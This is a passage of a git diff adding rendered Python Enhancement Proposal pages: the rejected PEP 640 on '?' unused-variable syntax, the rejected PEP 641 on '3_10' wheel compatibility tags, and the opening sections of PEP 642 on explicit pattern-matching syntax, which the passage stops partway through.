Acknowledgments

+
    +
  • Alyssa Coghlan
  • +
  • Kevin P. Fleming
  • +
  • Pradyun Gedam
  • +
  • Oleg Grenrus
  • +
  • Dustin Ingram
  • +
  • Chris Jerdonek
  • +
  • Cyril Roelandt
  • +
  • Luis Villa
  • +
  • Seth M. Larson
  • +
  • Ofek Lev
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0639.rst

+

Last modified: 2024-08-29 18:30:14 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0640/index.html b/pep-0640/index.html new file mode 100644 index 00000000000..f4ab03d2273 --- /dev/null +++ b/pep-0640/index.html @@ -0,0 +1,327 @@ + + + + + + + + PEP 640 – Unused variable syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 640 – Unused variable syntax

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
19-Oct-2020
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Rejection Note

+

Rejected by the Steering Council: +https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/

+
+
+

Abstract

+

This PEP proposes new syntax for unused variables, providing a pseudo-name +that can be assigned to but not otherwise used. The assignment doesn’t +actually happen, and the value is discarded instead.

+
+
+

Motivation

+

In Python it is somewhat common to need to do an assignment without actually +needing the result. Conventionally, people use either "_" or a name such +as "unused" (or with "unused" as a prefix) for this. It’s most +common in unpacking assignments:

+
x, unused, z = range(3)
+x, *unused, z = range(10)
+
+
+

It’s also used in for loops and comprehensions:

+
for unused in range(10): ...
+[ SpamObject() for unused in range(10) ]
+
+
+

The use of "_" in these cases is probably the most common, but it +potentially conflicts with the use of "_" in internationalization, where +a call like gettext.gettext() is bound to "_" and used to mark strings +for translation.

+

In the proposal to add Pattern Matching to Python (originally PEP 622, now +split into PEP 634, PEP 635 and PEP 636), "_" has an additional +special meaning. It is a wildcard pattern, used in places where variables +could be assigned to, to indicate anything should be matched but not +assigned to anything. The choice of "_" there matches the use of "_" +in other languages, but the semantic difference with "_" elsewhere in +Python is significant.

+

This PEP proposes to allow a special token, "?", to be used instead of +any valid name in assignment. This has most of the benefits of "_" +without affecting other uses of that otherwise regular variable. Allowing +the use of the same wildcard pattern would make pattern matching and +unpacking assignment more consistent with each other.

+
+
+

Rationale

+

Marking certain variables as unused is a useful tool, as it helps clarity of +purpose of the code. It makes it obvious to readers of the code as well as +automated linters, that a particular variable is intentionally unused.

+

However, despite the convention, "_" is not a special variable. The +value is still assigned to, the object it refers to is still kept alive +until the end of the scope, and it can still be used. Nor is the use of +"_" for unused variables entirely ubiquitous, since it conflicts with +conventional internationalization, it isn’t obvious that it is a regular +variable, and it isn’t as obviously unused like a variable named +"unused".

+

In the Pattern Matching proposal, the use of "_" for wildcard patterns +side-steps the problems of "_" for unused variables by virtue of it +being in a separate scope. The only conflict it has with +internationalization is one of potential confusion, it will not actually +interact with uses of a global variable called "_". However, the +special-casing of "_" for this wildcard pattern purpose is still +problematic: the different semantics and meaning of "_" inside pattern +matching and outside of it means a break in consistency in Python.

+

Introducing "?" as special syntax for unused variables both inside and +outside pattern matching allows us to retain that consistency. It avoids +the conflict with internationalization or any other uses of _ as a +variable. It makes unpacking assignment align more closely with pattern +matching, making it easier to explain pattern matching as an extension of +unpacking assignment.

+

In terms of code readability, using a special token makes it easier to find +out what it means ("what does question mark in Python do" versus "why +is my _ variable not getting assigned to"), and makes it more obvious that +the actual intent is for the value to be unused – since it is entirely +impossible to use it.

+
+
+

Specification

+

A new token is introduced, "?", or token.QMARK.

+

The grammar is modified to allow "?" in assignment contexts +(star_atom and t_atom in the current grammar), creating a Name +AST node with identifier set to NULL.

+

The AST is modified to allow the Name expression’s identifier to be +optional (it is currently required). The identifier being empty would only +be allowed in a STORE context.

+

In CPython, the bytecode compiler is modified to emit POP_TOP instead of +STORE_NAME for Name nodes with no identifier. Other uses of the +Name node are updated to handle the identifier being empty, as +appropriate.

+

The uses of the modified grammar nodes encompass at least the following +forms of assignment:

+
? = ...
+x, ?, z = ...
+x, *?, z = ...
+for ? in range(3): ...  # including comprehension forms
+for x, ?, z in matrix: ...  # including comprehension forms
+with open(f) as ?: ...
+with func() as (x, ?, z): ...
+
+
+

The use of a single "?", not in an unpacking context, is allowed in +normal assignment and the with statement. It doesn’t really make sense +on its own, and it is possible to disallow those specific cases. However, +for ? in range(3) clearly has its uses, so for consistency reasons if +nothing else it seems more sensible to allow the use of the single "?" +in other cases.

+

Using "?" in augmented assignment (? *= 2) is not allowed, since +"?" can only be used for assignment. Having multiple occurrences of +"?" is valid, just like when assigning to names, and the assignments do +not interfere with each other.

+
+
+

Backwards Compatibility

+

Introducing a new token means there are no backward compatibility concerns. +No valid syntax changes meaning.

+

"?" is not considered an identifier, so str.isidentifier() does not +change.

+

The AST does change in an incompatible way, as the identifier of a Name +token can now be empty. Code using the AST will have to be adjusted +accordingly.

+
+
+

How to Teach This

+

"?" can be introduced along with unpacking assignment, explaining it is +special syntax for ‘unused’ and mentioning that it can also be used in other +places. Alternatively, it could be introduced as part of an explanation on +assignment in for loops, showing an example where the loop variable is +unused.

+

PEP 636 discusses how to teach "_", and can simply replace "_" with +"?", perhaps noting that "?" is similarly usable in other contexts.

+
+
+

Reference Implementation

+

A prototype implementation exists at +<https://github.com/Yhg1s/cpython/tree/nonassign>.

+
+
+

Rejected Ideas

+
+
+

Open Issues

+

Should "?" be allowed in the following contexts:

+
# imports done for side-effect only.
+import os as ?
+from os import path as ?
+
+# Function defined for side-effects only (e.g. decorators)
+@register_my_func
+def ?(...): ...
+
+# Class defined for side-effects only (e.g. decorators, __init_subclass__)
+class ?(...): ...
+
+# Parameters defined for unused positional-only arguments:
+def f(a, ?, ?): ...
+lambda a, ?, ?: ...
+
+# Unused variables with type annotations:
+?: int = f()
+
+# Exception handling:
+try: ...
+except Exception as ?: ...
+
+# With blocks:
+with open(f) as ?: ...
+
+
+

Some of these may seem to make sense from a consistency point of view, but +practical uses are limited and dubious. Type annotations on "?" and +using it with except and with do not seem to make any sense. In the +reference implementation, except is not supported (the existing syntax +only allows a name) but with is (by virtue of the existing syntax +supporting unpacking assignment).

+

Should this PEP be accepted even if pattern matching is rejected?

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0640.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0641/index.html b/pep-0641/index.html new file mode 100644 index 00000000000..ef01f4d1e03 --- /dev/null +++ b/pep-0641/index.html @@ -0,0 +1,305 @@ + + + + + + + + PEP 641 – Using an underscore in the version portion of Python 3.10 compatibility tags | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 641 – Using an underscore in the version portion of Python 3.10 compatibility tags

+
+
Author:
+
Brett Cannon <brett at python.org>, +Steve Dower <steve.dower at python.org>, +Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Pablo Galindo <pablogsal at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
21-Oct-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+
+

Note

+

This PEP was rejected due to potential breakage in the community.

+
+

Using the tag system outlined in PEP 425 (primarily used for wheel +file names), each release of Python specifies compatibility tags +(e.g. cp39, py39 for CPython 3.9). For CPython 3.10, this PEP +proposes using 3_10 as the version portion of the tags +(instead of 310).

+
+
+

Motivation

+

Up to this point, the version portion of compatibility tags used in +e.g. wheel file names has been a straight concatenation of the major +and minor versions of Python, both for the CPython interpreter tag and +the generic, interpreter-agnostic interpreter tag (e.g. cp39 and +py39, respectively). This also applies to the ABI tag +(e.g. cp39). Thanks to both the major and minor versions being +single digits, it has been unambiguous what which digit in e.g. 39 +represented.

+

But starting with Python 3.10, ambiguity comes up as 310 does not +clearly delineate whether the Python version is 3.10, 31.0, or +310 as the major-only version of Python. Thus using 3_10 to +separate major/minor portions as allowed by PEP 425 disambiguates +the Python version being supported.

+
+
+

Rationale

+

Using 3_10 instead of another proposed separator is a restriction +of PEP 425, thus the only options are 3_10 or 310.

+
+
+

Specification

+

The SOABI configure variable and +sysconfig.get_config_var('py_version_nodot') will be updated to +use 3_10 appropriately.

+
+
+

Backwards Compatibility

+

Tools relying on the ‘packaging’ project [2] already expect a +version specification of 3_10 for Python 3.10. Keeping the version +specifier as 310 would require backing that change out and +updating dependent projects (e.g. pip).

+

Switching to 3_10 will impact any tools that implicitly rely on +the convention that the minor version is a single digit. However, +these are broken regardless of any change here.

+

For tools assuming the major version is only the first digit, they +will require updating if we switch to 3_10.

+

In non-locale ASCII, _ sorts after any digit, so lexicographic +sorting matching a sort by Python version of a wheel file name will be +kept.

+

Since PEP 515 (Python 3.6), underscores in numeric literals are ignored. +This means that int("3_10") and int("310") produce the same result, +and ordering based on conversion to an integer will be preserved. +However, this is still a bad way to sort tags, and the point is raised +here simply to show that this proposal does not make things worse.

+
+
+

Security Implications

+

There are no known security concerns.

+
+
+

How to Teach This

+

As use of the interpreter tag is mostly machine-based and this PEP +disambiguates, there should not be any special teaching consideration +required.

+
+
+

Reference Implementation

+

A pull request [1] already exists adding support to CPython 3.10. +Support for reading wheel files with this proposed PEP is already +implemented.

+
+
+

Rejected Ideas

+
+

Not making the change

+

It was considered to not change the tag and stay with 310. The +argument was it’s less work and it won’t break any existing +tooling. But in the end it was thought that the disambiguation is +better to have.

+
+
+
+

Open Issues

+
+

How far should we take this?

+

Other places where the major and minor version are used could be +updated to use an underscore as well (e.g. .pyc files, the import +path to the zip file for the stdlib). It is not known how useful it +would be to make this pervasive.

+
+
+

Standardizing on double digit minor version numbers

+

An alternative suggestion has been made to disambiguate where the +major and minor versions start/stop by forcing the minor version to +always be two digits, padding with a 0 as required. The advantages +of this is it makes the current cp310 interpreter tag accurate, +thus minimizing breakage. It also does differentiate going forward.

+

There are a couple of drawbacks, though. One is the disambiguation +only exists if you know that the minor version number is two digits; +compare that to cp3_10 which is unambiguous regardless of your +base knowledge. The potential for a three digit minor version number +is also not addressed by this two digit requirement.

+

There is also the issue of other interpreters not following the +practice in the past, present, or future. For instance, it is +unknown if other people have used a three digit version portion of the +interpreter tag previously for another interpreter where this rule +would be incorrect. This change would also suggest that interpreters which +currently have a single digit minor version – e.g. PyPy 7.3 – to +change from pp73 to pp703 or make the switch from their next +minor release onward (e.g. 7.4 or 8.0). Otherwise this would make this +rule exclusive to the cp interpreter type which would make it more +confusing for people.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0641.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0642/index.html b/pep-0642/index.html new file mode 100644 index 00000000000..70059ddf420 --- /dev/null +++ b/pep-0642/index.html @@ -0,0 +1,2107 @@ + + + + + + + + PEP 642 – Explicit Pattern Syntax for Structural Pattern Matching | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 642 – Explicit Pattern Syntax for Structural Pattern Matching

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
634
+
Created:
+
26-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
31-Oct-2020, 08-Nov-2020, 03-Jan-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP covers an alternative syntax proposal for PEP 634’s structural pattern +matching that requires explicit prefixes on all capture patterns and value +constraints. It also proposes a new dedicated syntax for instance attribute +patterns that aligns more closely with the proposed mapping pattern syntax.

+

While the result is necessarily more verbose than the proposed syntax in +PEP 634, it is still significantly less verbose than the status quo.

+

As an example, the following match statement would extract “host” and “port” +details from a 2 item sequence, a mapping with “host” and “port” keys, any +object with “host” and “port” attributes, or a “host:port” string, treating +the “port” as optional in the latter three cases:

+
port = DEFAULT_PORT
+match expr:
+    case [as host, as port]:
+        pass
+    case {"host" as host, "port" as port}:
+        pass
+    case {"host" as host}:
+        pass
+    case object{.host as host, .port as port}:
+        pass
+    case object{.host as host}:
+        pass
+    case str{} as addr:
+        host, __, optional_port = addr.partition(":")
+        if optional_port:
+            port = optional_port
+    case __ as m:
+        raise TypeError(f"Unknown address format: {m!r:.200}")
+port = int(port)
+
+
+

At a high level, this PEP proposes to categorise the different available pattern +types as follows:

+
    +
  • wildcard pattern: __
  • +
  • group patterns: (PTRN)
  • +
  • +
    value constraint patterns:
      +
    • equality constraints: == EXPR
    • +
    • identity constraints: is EXPR
    • +
    +
    +
    +
  • +
  • +
    structural constraint patterns:
      +
    • sequence constraint patterns: [PTRN, as NAME, PTRN as NAME]
    • +
    • mapping constraint patterns: {EXPR: PTRN, EXPR as NAME}
    • +
    • instance attribute constraint patterns: +CLS{.NAME, .NAME: PTRN, .NAME == EXPR, .NAME as NAME}
    • +
    • class defined constraint patterns: +CLS(PTRN, PTRN, **{.NAME, .NAME: PTRN, .NAME == EXPR, .NAME as NAME})
    • +
    +
    +
    +
  • +
  • OR patterns: PTRN | PTRN | PTRN
  • +
  • AS patterns: PTRN as NAME (omitting the pattern implies __)
  • +
+

The intent of this approach is to:

+
    +
  • allow an initial form of pattern matching to be developed and released without +needing to decide up front on the best default options for handling bare names, +attribute lookups, and literal values
  • +
  • ensure that pattern matching is defined explicitly at the Abstract Syntax Tree +level, allowing the specifications of the semantics and the surface syntax for +pattern matching to be clearly separated
  • +
  • define a clear and concise “ducktyping” syntax that could potentially be +adopted in ordinary expressions as a way to more easily retrieve a tuple +containing multiple attributes from the same object
  • +
+

Relative to PEP 634, the proposal also deliberately eliminates any syntax that +“binds to the right” without using the as keyword (using capture patterns +in PEP 634’s mapping patterns and class patterns) or binds to both the left and +the right in the same pattern (using PEP 634’s capture patterns with AS patterns)

+
+
+

Relationship with other PEPs

+

This PEP both depends on and competes with PEP 634 - the PEP author agrees that +match statements would be a sufficiently valuable addition to the language to +be worth the additional complexity that they add to the learning process, but +disagrees with the idea that “simple name vs literal or attribute lookup” +really offers an adequate syntactic distinction between name binding and value +lookup operations in match patterns (at least for Python).

+

This PEP agrees with the spirit of PEP 640 (that the chosen wildcard pattern to +skip a name binding should be supported everywhere, not just in match patterns), +but is now proposing a different spelling for the wildcard syntax (__ rather +than ?). As such, it competes with PEP 640 as written, but would complement +a proposal to deprecate the use of __ as an ordinary identifier and instead +turn it into a general purpose wildcard marker that always skips making a new +local variable binding.

+

While it has not yet been put forward as a PEP, Mark Shannon has a pre-PEP draft +[8] expressing several concerns about the runtime semantics of the pattern +matching proposal in PEP 634. This PEP is somewhat complementary to that one, as +even though this PEP is mostly about surface syntax changes rather than major +semantic changes, it does propose that the Abstract Syntax Tree definition be +made more explicit to better separate the details of the surface syntax from the +semantics of the code generation step. There is one specific idea in that pre-PEP +draft that this PEP explicitly rejects: the idea that the different kinds of +matching are mutually exclusive. It’s entirely possible for the same value to +match different kinds of structural pattern, and which one takes precedence will +intentionally be governed by the order of the cases in the match statement.

+
+
+

Motivation

+

The original PEP 622 (which was later split into PEP 634, PEP 635, and PEP 636) +incorporated an unstated but essential assumption in its syntax design: that +neither ordinary expressions nor the existing assignment target syntax provide +an adequate foundation for the syntax used in match patterns.

+

While the PEP didn’t explicitly state this assumption, one of the PEP authors +explained it clearly on python-dev [1]:

+
+
The actual problem that I see is that we have different cultures/intuitions +fundamentally clashing here. In particular, so many programmers welcome +pattern matching as an “extended switch statement” and find it therefore +strange that names are binding and not expressions for comparison. Others +argue that it is at odds with current assignment statements, say, and +question why dotted names are _/not/_ binding. What all groups seem to +have in common, though, is that they refer to _/their/_ understanding and +interpretation of the new match statement as ‘consistent’ or ‘intuitive’ +— naturally pointing out where we as PEP authors went wrong with our +design.

But here is the catch: at least in the Python world, pattern matching as +proposed by this PEP is an unprecedented and new way of approaching a common +problem. It is not simply an extension of something already there. Even +worse: while designing the PEP we found that no matter from which angle you +approach it, you will run into issues of seeming ‘inconsistencies’ (which is +to say that pattern matching cannot be reduced to a ‘linear’ extension of +existing features in a meaningful way): there is always something that goes +fundamentally beyond what is already there in Python. That’s why I argue +that arguments based on what is ‘intuitive’ or ‘consistent’ just do not +make sense _/in this case/_.

+
+

The first iteration of this PEP was then born out of an attempt to show that the +second assertion was not accurate, and that match patterns could be treated +as a variation on assignment targets without leading to inherent contradictions. +(An earlier PR submitted to list this option in the “Rejected Ideas” section +of the original PEP 622 had previously been declined [2]).

+

However, the review process for this PEP strongly suggested that not only did +the contradictions that Tobias mentioned in his email exist, but they were also +concerning enough to cast doubts on the syntax proposal presented in PEP 634. +Accordingly, this PEP was changed to go even further than PEP 634, and largely +abandon alignment between the sequence matching syntax and the existing iterable +unpacking syntax (effectively answering “Not really, as least as far as the +exact syntax is concerned” to the first question raised in the DLS’20 paper +[9]: “Can we extend a feature like iterable unpacking to work for more general +object and data layouts?”).

+

This resulted in a complete reversal of the goals of the PEP: rather than +attempting to emphasise the similarities between assignment and pattern matching, +the PEP now attempts to make sure that assignment target syntax isn’t being +reused at all, reducing the likelihood of incorrect inferences being drawn +about the new construct based on experience with existing ones.

+

Finally, before completing the 3rd iteration of the proposal (which dropped +inferred patterns entirely), the PEP author spent quite a bit of time reflecting +on the following entries in PEP 20:

+
    +
  • Explicit is better than implicit.
  • +
  • Special cases aren’t special enough to break the rules.
  • +
  • In the face of ambiguity, refuse the temptation to guess.
  • +
+

If we start with an explicit syntax, we can always add syntactic shortcuts later +(e.g. consider the recent proposals to add shortcuts for Union and +Optional type hints only after years of experience with the original more +verbose forms), while if we start out with only the abbreviated forms, +then we don’t have any real way to revisit those decisions in a future release.

+
+
+

Specification

+

This PEP retains the overall match/case statement structure and semantics +from PEP 634, but proposes multiple changes that mean that user intent is +explicitly specified in the concrete syntax rather than needing to be inferred +from the pattern matching context.

+

In the proposed Abstract Syntax Tree, the semantics are also always explicit, +with no inference required.

+
+

The Match Statement

+

Surface syntax:

+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' star_named_expressions?
+    | named_expression
+case_block: "case" (guarded_pattern | open_pattern) ':' block
+
+guarded_pattern: closed_pattern 'if' named_expression
+
+open_pattern:
+    | as_pattern
+    | or_pattern
+
+closed_pattern:
+    | wildcard_pattern
+    | group_pattern
+    | structural_constraint
+
+
+

Abstract syntax:

+
Match(expr subject, match_case* cases)
+match_case = (pattern pattern, expr? guard, stmt* body)
+
+
+

The rules star_named_expression, star_named_expressions, +named_expression and block are part of the standard Python +grammar.

+

Open patterns are patterns which consist of multiple tokens, and aren’t +necessarily terminated by a closing delimiter (for example, __ as x, +int() | bool()). To avoid ambiguity for human readers, their usage is +restricted to top level patterns and to group patterns (which are patterns +surrounded by parentheses).

+

Closed patterns are patterns which either consist of a single token +(i.e. __), or else have a closing delimiter as a required part of their +syntax (e.g. [as x, as y], object{.x as x, .y as y}).

+

As in PEP 634, the match and case keywords are soft keywords, i.e. they +are not reserved words in other grammatical contexts (including at the +start of a line if there is no colon where expected). This means +that they are recognized as keywords when part of a match +statement or case block only, and are allowed to be used in all +other contexts as variable or argument names.

+

Unlike PEP 634, patterns are explicitly defined as a new kind of node in the +abstract syntax tree - even when surface syntax is shared with existing +expression nodes, a distinct abstract node is emitted by the parser.

+

For context, match_stmt is a new alternative for +compound_statement in the surface syntax and Match is a new +alternative for stmt in the abstract syntax.

+
+

Match Semantics

+

This PEP largely retains the overall pattern matching semantics proposed in +PEP 634.

+

The proposed syntax for patterns changes significantly, and is discussed in +detail below.

+

There are also some proposed changes to the semantics of class defined +constraints (class patterns in PEP 634) to eliminate the need to special case +any builtin types (instead, the introduction of dedicated syntax for instance +attribute constraints allows the behaviour needed by those builtin types to be +specified as applying to any type that sets __match_args__ to None)

+
+
+

Guards

+

This PEP retains the guard clause semantics proposed in PEP 634.

+

However, the syntax is changed slightly to require that when a guard clause +is present, the case pattern must be a closed pattern.

+

This makes it clearer to the reader where the pattern ends and the guard clause +begins. (This is mainly a potential problem with OR patterns, where the guard +clause looks kind of like the start of a conditional expression in the final +pattern. Actually doing that isn’t legal syntax, so there’s no ambiguity as far +as the compiler is concerned, but the distinction may not be as clear to a human +reader)

+
+
+

Irrefutable case blocks

+

The definition of irrefutable case blocks changes slightly in this PEP relative +to PEP 634, as capture patterns no longer exist as a separate concept from +AS patterns.

+

Aside from that caveat, the handling of irrefutable cases is the same as in +PEP 634:

+
    +
  • wildcard patterns are irrefutable
  • +
  • AS patterns whose left-hand side is irrefutable
  • +
  • OR patterns containing at least one irrefutable pattern
  • +
  • parenthesized irrefutable patterns
  • +
  • a case block is considered irrefutable if it has no guard and its +pattern is irrefutable.
  • +
  • a match statement may have at most one irrefutable case block, and it +must be last.
  • +
+
+
+
+

Patterns

+

The top-level surface syntax for patterns is as follows:

+
open_pattern: # Pattern may use multiple tokens with no closing delimiter
+    | as_pattern
+    | or_pattern
+
+as_pattern: [closed_pattern] pattern_as_clause
+
+or_pattern: '|'.simple_pattern+
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+closed_pattern: # Require a single token or a closing delimiter in pattern
+    | wildcard_pattern
+    | group_pattern
+    | structural_constraint
+
+
+

As described above, the usage of open patterns is limited to top level case +clauses and when parenthesised in a group pattern.

+

The abstract syntax for patterns explicitly indicates which elements are +subpatterns and which elements are subexpressions or identifiers:

+
pattern = MatchAlways
+     | MatchValue(matchop op, expr value)
+     | MatchSequence(pattern* patterns)
+     | MatchMapping(expr* keys, pattern* patterns)
+     | MatchAttrs(expr cls, identifier* attrs, pattern* patterns)
+     | MatchClass(expr cls, pattern* patterns, identifier* extra_attrs, pattern* extra_patterns)
+
+     | MatchRestOfSequence(identifier? target)
+     -- A NULL entry in the MatchMapping key list handles capturing extra mapping keys
+
+     | MatchAs(pattern? pattern, identifier target)
+     | MatchOr(pattern* patterns)
+
+
+
+

AS Patterns

+

Surface syntax:

+
as_pattern: [closed_pattern] pattern_as_clause
+pattern_as_clause: 'as' pattern_capture_target
+pattern_capture_target: !"__" NAME !('.' | '(' | '=')
+
+
+

(Note: the name on the right may not be __.)

+

Abstract syntax:

+
MatchAs(pattern? pattern, identifier target)
+
+
+

An AS pattern matches the closed pattern on the left of the as +keyword against the subject. If this fails, the AS pattern fails. +Otherwise, the AS pattern binds the subject to the name on the right +of the as keyword and succeeds.

+

If no pattern to match is given, the wildcard pattern (__) is implied.

+

To avoid confusion with the wildcard pattern, the double underscore (__) +is not permitted as a capture target (this is what !"__" expresses).

+

A capture pattern always succeeds. It binds the subject value to the +name using the scoping rules for name binding established for named expressions +in PEP 572. (Summary: the name becomes a local +variable in the closest containing function scope unless there’s an +applicable nonlocal or global statement.)

+

In a given pattern, a given name may be bound only once. This +disallows for example case [as x, as x]: ... but allows +case [as x] | (as x):

+

As an open pattern, the usage of AS patterns is limited to top level case +clauses and when parenthesised in a group pattern. However, several of the +structural constraints allow the use of pattern_as_clause in relevant +locations to bind extracted elements of the matched subject to local variables. +These are mostly represented in the abstract syntax tree as MatchAs nodes, +aside from the dedicated MatchRestOfSequence node in sequence patterns.

+
+
+

OR Patterns

+

Surface syntax:

+
or_pattern: '|'.simple_pattern+
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+
+

Abstract syntax:

+
MatchOr(pattern* patterns)
+
+
+

When two or more patterns are separated by vertical bars (|), +this is called an OR pattern. (A single simple pattern is just that)

+

Only the final subpattern may be irrefutable.

+

Each subpattern must bind the same set of names.

+

An OR pattern matches each of its subpatterns in turn to the subject, +until one succeeds. The OR pattern is then deemed to succeed. +If none of the subpatterns succeed the OR pattern fails.

+

Subpatterns are mostly required to be closed patterns, but the parentheses may +be omitted for value constraints.

+
+
+

Value constraints

+

Surface syntax:

+
value_constraint:
+    | eq_constraint
+    | id_constraint
+
+eq_constraint: '==' closed_expr
+id_constraint: 'is' closed_expr
+
+closed_expr: # Require a single token or a closing delimiter in expression
+    | primary
+    | closed_factor
+
+closed_factor: # "factor" is the main grammar node for these unary ops
+    | '+' primary
+    | '-' primary
+    | '~' primary
+
+
+

Abstract syntax:

+
MatchValue(matchop op, expr value)
+matchop = EqCheck | IdCheck
+
+
+

The rule primary is defined in the standard Python grammar, and only +allows expressions that either consist of a single token, or else are required +to end with a closing delimiter.

+

Value constraints replace PEP 634’s literal patterns and value patterns.

+

Equality constraints are written as == EXPR, while identity constraints are +written as is EXPR.

+

An equality constraint succeeds if the subject value compares equal to the +value given on the right, while an identity constraint succeeds only if they are +the exact same object.

+

The expressions to be compared against are largely restricted to either +single tokens (e.g. names, strings, numbers, builtin constants), or else to +expressions that are required to end with a closing delimiter.

+

The use of the high precedence unary operators is also permitted, as the risk of +perceived ambiguity is low, and being able to specify negative numbers without +parentheses is desirable.

+

When the same constraint expression occurs multiple times in the same match +statement, the interpreter may cache the first value calculated and reuse it, +rather than repeat the expression evaluation. (As for PEP 634 value patterns, +this cache is strictly tied to a given execution of a given match statement.)

+

Unlike literal patterns in PEP 634, this PEP requires that complex +literals be parenthesised to be accepted by the parser. See the Deferred +Ideas section for discussion on that point.

+

If this PEP were to be adopted in preference to PEP 634, then all literal and +value patterns would instead be written more explicitly as value constraints:

+
# Literal patterns
+match number:
+    case == 0:
+        print("Nothing")
+    case == 1:
+        print("Just one")
+    case == 2:
+        print("A couple")
+    case == -1:
+        print("One less than nothing")
+    case == (1-1j):
+        print("Good luck with that...")
+
+# Additional literal patterns
+match value:
+    case == True:
+        print("True or 1")
+    case == False:
+        print("False or 0")
+    case == None:
+        print("None")
+    case == "Hello":
+        print("Text 'Hello'")
+    case == b"World!":
+        print("Binary 'World!'")
+
+# Matching by identity rather than equality
+SENTINEL = object()
+match value:
+    case is True:
+        print("True, not 1")
+    case is False:
+        print("False, not 0")
+    case is None:
+        print("None, following PEP 8 comparison guidelines")
+    case is ...:
+        print("May be useful when writing __getitem__ methods?")
+    case is SENTINEL:
+        print("Matches the sentinel by identity, not just value")
+
+# Matching against variables and attributes
+from enum import Enum
+class Sides(str, Enum):
+    SPAM = "Spam"
+    EGGS = "eggs"
+    ...
+
+preferred_side = Sides.EGGS
+match entree[-1]:
+    case == Sides.SPAM:  # Compares entree[-1] == Sides.SPAM.
+        response = "Have you got anything without Spam?"
+    case == preferred_side:  # Compares entree[-1] == preferred_side
+        response = f"Oh, I love {preferred_side}!"
+    case as side:  # Assigns side = entree[-1].
+        response = f"Well, could I have their Spam instead of the {side} then?"
+
+
+

Note the == preferred_side example: using an explicit prefix marker on +constraint expressions removes the restriction to only working with attributes +or literals for value lookups.

+

The == (1-1j) example illustrates the use of parentheses to turn any +subexpression into a closed one.

+
+
+

Wildcard Pattern

+

Surface syntax:

+
wildcard_pattern: "__"
+
+
+

Abstract syntax:

+
MatchAlways
+
+
+

A wildcard pattern always succeeds. As in PEP 634, it binds no name.

+

Where PEP 634 chooses the single underscore as its wildcard pattern for +consistency with other languages, this PEP chooses the double underscore as that +has a clearer path towards potentially being made consistent across the entire +language, whereas that path is blocked for "_" by i18n related use cases.

+

Example usage:

+
match sequence:
+    case [__]:               # any sequence with a single element
+        return True
+    case [start, *__, end]:  # a sequence with at least two elements
+        return start == end
+    case __:                 # anything
+        return False
+
+
+
+
+

Group Patterns

+

Surface syntax:

+
group_pattern: '(' open_pattern ')'
+
+
+

For the syntax of open_pattern, see Patterns above.

+

A parenthesized pattern has no additional syntax and is not represented in the +abstract syntax tree. It allows users to add parentheses around patterns to +emphasize the intended grouping, and to allow nesting of open patterns when the +grammar requires a closed pattern.

+

Unlike PEP 634, there is no potential ambiguity with sequence patterns, as +this PEP requires that all sequence patterns be written with square brackets.

+
+
+

Structural constraints

+

Surface syntax:

+
structural_constraint:
+    | sequence_constraint
+    | mapping_constraint
+    | attrs_constraint
+    | class_constraint
+
+
+

Note: the separate “structural constraint” subcategory isn’t used in the +abstract syntax tree, it’s merely used as a convenient grouping node in the +surface syntax definition.

+

Structural constraints are patterns used to both make assertions about complex +objects and to extract values from them.

+

These patterns may all bind multiple values, either through the use of nested +AS patterns, or else through the use of pattern_as_clause elements included +in the definition of the pattern.

+
+
+

Sequence constraints

+

Surface syntax:

+
sequence_constraint: '[' [sequence_constraint_elements] ']'
+sequence_constraint_elements: ','.sequence_constraint_element+ ','?
+sequence_constraint_element:
+    | star_pattern
+    | simple_pattern
+    | pattern_as_clause
+star_pattern: '*' (pattern_as_clause | wildcard_pattern)
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+pattern_as_clause: 'as' pattern_capture_target
+
+
+

Abstract syntax:

+
MatchSequence(pattern* patterns)
+
+MatchRestOfSequence(identifier? target)
+
+
+

Sequence constraints allow items within a sequence to be checked and +optionally extracted.

+

